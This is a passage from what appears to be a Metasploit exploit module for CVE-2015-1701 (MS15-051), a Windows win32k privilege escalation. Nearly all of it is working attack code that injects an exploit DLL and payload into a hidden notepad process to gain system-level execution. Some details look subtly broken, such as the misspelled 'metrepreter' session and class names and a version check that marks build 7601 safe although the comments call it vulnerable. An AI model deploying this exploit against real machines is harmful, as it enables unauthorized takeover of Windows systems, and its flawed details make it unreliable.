'Platform' => 'win',
'SessionTypes' => [ 'metrepreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2015-1701'],
['MSB', 'MS15-051'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
['URL', 'https://technet.microsoft.com/library/security/MS15-051']
],
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0
}))
end
def check
# Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)
# Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)
# Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)
# Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)
if sysinfo['OS'] !~ /windows/i
return Exploit::CheckCode::Unknown
end
if sysinfo['Architecture'] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo['Architecture'] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
return Exploit::CheckCode::Safe if build == 7601
return Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if sysinfo['Architecture'] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Metrepreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2015-1701.x86.dll'
else
dll_file_name = 'cve-2015-1701.x64.dll'
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end